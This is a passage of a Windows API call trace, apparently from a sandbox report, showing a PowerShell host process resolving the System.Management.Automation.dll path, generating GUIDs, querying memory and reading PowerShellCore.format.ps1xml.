lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.634] GetLastError () returned 0x0 [0044.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.634] GetLastError () returned 0x0 [0044.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.634] GetLastError () returned 0x0 [0044.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.634] GetLastError () returned 0x0 [0044.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.634] GetLastError () returned 0x0 [0044.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.635] GetLastError () returned 0x0 [0044.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.635] GetLastError () returned 0x0 [0044.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.635] GetLastError () returned 0x0 [0044.635] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x376a9ab5, Data2=0xe9e8, Data3=0x4374, Data4=([0]=0xb9, [1]=0x31, [2]=0xb7, [3]=0xb0, [4]=0x7d, [5]=0xcf, [6]=0xb3, [7]=0x82))) returned 0x0 [0044.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.635] GetLastError () returned 0x0 [0044.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.635] GetLastError () returned 0x0 [0044.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.635] GetLastError () returned 0x0 [0044.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.635] GetLastError () returned 0x0 [0044.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.635] GetLastError () returned 0x0 [0044.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.635] GetLastError () returned 0x0 [0044.635] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xeaeedd65, Data2=0x2666, Data3=0x4100, Data4=([0]=0xbf, [1]=0xda, [2]=0x30, [3]=0x43, [4]=0xa2, [5]=0x61, [6]=0x0, [7]=0xef))) returned 0x0 [0044.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.635] GetLastError () returned 0x0 [0044.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.635] GetLastError () returned 0x0 [0044.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.635] GetLastError () returned 0x0 [0044.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.635] GetLastError () returned 0x0 [0044.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.635] GetLastError () returned 0x0 [0044.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.636] GetLastError () returned 0x0 [0044.636] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x1dfcd39a, Data2=0x25fe, Data3=0x4fee, Data4=([0]=0x82, [1]=0xe7, [2]=0x16, [3]=0x43, [4]=0xca, [5]=0x8e, [6]=0x2a, [7]=0xfd))) returned 0x0 [0044.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.636] GetLastError () returned 0x0 [0044.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.636] GetLastError () returned 0x0 [0044.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.636] GetLastError () returned 0x0 [0044.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.636] GetLastError () returned 0x0 [0044.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.636] GetLastError () returned 0x0 [0044.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.636] GetLastError () returned 0x0 [0044.636] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x539297f5, Data2=0x2d3c, Data3=0x443b, Data4=([0]=0xb1, [1]=0x67, [2]=0xc2, [3]=0x7, [4]=0xa5, [5]=0x7d, [6]=0x5b, [7]=0x66))) returned 0x0 [0044.636] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xfe5a3eb, Data2=0x8a08, Data3=0x4fae, Data4=([0]=0x81, [1]=0xc3, [2]=0xc3, [3]=0xab, [4]=0x3c, [5]=0x67, [6]=0xb6, [7]=0xd4))) returned 0x0 [0044.636] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x60934f24, Data2=0x1003, Data3=0x4006, Data4=([0]=0xa2, [1]=0xa, [2]=0x3d, [3]=0x19, [4]=0xd0, [5]=0x9b, [6]=0x49, [7]=0x99))) returned 0x0 [0044.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.636] GetLastError () returned 0x0 [0044.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.636] GetLastError () returned 0x0 [0044.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.636] GetLastError () returned 0x0 [0044.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.636] GetLastError () returned 0x0 [0044.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.637] GetLastError () returned 0x0 [0044.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.637] GetLastError () returned 0x0 [0044.637] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x20ded40, Data2=0x92b2, Data3=0x4bd6, Data4=([0]=0xb9, [1]=0x51, [2]=0xa4, [3]=0x53, [4]=0x3a, [5]=0xa, [6]=0xd2, [7]=0x5e))) returned 0x0 [0044.637] VirtualQuery (in: lpAddress=0x25cc34, lpBuffer=0x25dc34, dwLength=0x1c | out: lpBuffer=0x25dc34*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.637] GetLastError () returned 0x0 [0044.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.637] GetLastError () returned 0x0 [0044.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.637] GetLastError () returned 0x0 [0044.637] VirtualQuery (in: lpAddress=0x25cc34, lpBuffer=0x25dc34, dwLength=0x1c | out: lpBuffer=0x25dc34*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.637] VirtualQuery (in: lpAddress=0x25cc70, lpBuffer=0x25dc70, dwLength=0x1c | out: lpBuffer=0x25dc70*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.637] GetLastError () returned 0x0 [0044.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.637] GetLastError () returned 0x0 [0044.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.637] GetLastError () returned 0x0 [0044.637] VirtualQuery (in: lpAddress=0x25cc34, lpBuffer=0x25dc34, dwLength=0x1c | out: lpBuffer=0x25dc34*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.637] VirtualQuery (in: lpAddress=0x25cc70, lpBuffer=0x25dc70, dwLength=0x1c | out: lpBuffer=0x25dc70*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.638] GetLastError () returned 0x0 [0044.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.638] GetLastError () returned 0x0 [0044.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.638] GetLastError () returned 0x0 [0044.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.638] GetLastError () returned 0x0 [0044.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.638] GetLastError () returned 0x0 [0044.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.638] GetLastError () returned 0x0 [0044.638] VirtualQuery (in: lpAddress=0x25cc34, lpBuffer=0x25dc34, dwLength=0x1c | out: lpBuffer=0x25dc34*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.638] VirtualQuery (in: lpAddress=0x25cc70, lpBuffer=0x25dc70, dwLength=0x1c | out: lpBuffer=0x25dc70*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.639] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x513dd157, Data2=0x8cf7, Data3=0x4ffb, Data4=([0]=0xbc, [1]=0x2d, [2]=0xfd, [3]=0x5f, [4]=0xa1, [5]=0x69, [6]=0x6a, [7]=0xa0))) returned 0x0 [0044.640] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xf9bd8bbd, Data2=0xe7ba, Data3=0x4418, Data4=([0]=0xbc, [1]=0x94, [2]=0xa2, [3]=0x8f, [4]=0x2e, [5]=0x16, [6]=0xeb, [7]=0x49))) returned 0x0 [0044.640] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x1ed68cf4, Data2=0x1547, Data3=0x42dd, Data4=([0]=0x96, [1]=0x63, [2]=0x15, [3]=0xbb, [4]=0xed, [5]=0xfe, [6]=0xfd, [7]=0x58))) returned 0x0 [0044.640] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x9c4687cf, Data2=0x536b, Data3=0x4544, Data4=([0]=0xaf, [1]=0x32, [2]=0x67, [3]=0xe1, [4]=0xfc, [5]=0xb1, [6]=0x0, [7]=0xd1))) returned 0x0 [0044.640] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xaf7ab969, Data2=0xc7ce, Data3=0x431d, Data4=([0]=0xb2, [1]=0xc5, [2]=0x70, [3]=0x0, [4]=0xa, [5]=0x66, [6]=0x99, [7]=0x35))) returned 0x0 [0044.641] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x16bbec25, Data2=0x6d4f, Data3=0x4f43, Data4=([0]=0x89, [1]=0x16, [2]=0x1d, [3]=0xde, [4]=0xc8, [5]=0x60, [6]=0x93, [7]=0xff))) returned 0x0 [0044.641] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x78348b72, Data2=0xcb7b, Data3=0x493e, Data4=([0]=0x82, [1]=0xef, [2]=0x34, [3]=0x46, [4]=0x2d, [5]=0xad, [6]=0x30, [7]=0x86))) returned 0x0 [0044.641] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x96adcfbf, Data2=0x4529, Data3=0x4399, Data4=([0]=0xb4, [1]=0x85, [2]=0x9e, [3]=0x9d, [4]=0xa4, [5]=0x45, [6]=0xb4, [7]=0x55))) returned 0x0 [0044.641] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x61c5e9ed, Data2=0xd7bd, Data3=0x4e48, Data4=([0]=0x9d, [1]=0x80, [2]=0x1d, [3]=0x50, [4]=0xc9, [5]=0x78, [6]=0x9f, [7]=0xca))) returned 0x0 [0044.641] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xcc574dac, Data2=0x5973, Data3=0x43a7, Data4=([0]=0xb6, [1]=0x5d, [2]=0x9c, [3]=0x5e, [4]=0x26, [5]=0x5c, [6]=0x11, [7]=0xe))) returned 0x0 [0044.641] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x344 [0044.641] GetLastError () returned 0x0 [0044.641] GetFileType (hFile=0x344) returned 0x1 [0044.641] SetErrorMode (uMode=0x1) returned 0x1 [0044.641] GetFileType (hFile=0x344) returned 0x1 [0044.642] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.643] GetLastError () returned 0x0 [0044.643] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.643] GetLastError () returned 0x0 [0044.643] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.643] GetLastError () returned 0x0 [0044.643] ReadFile (in: 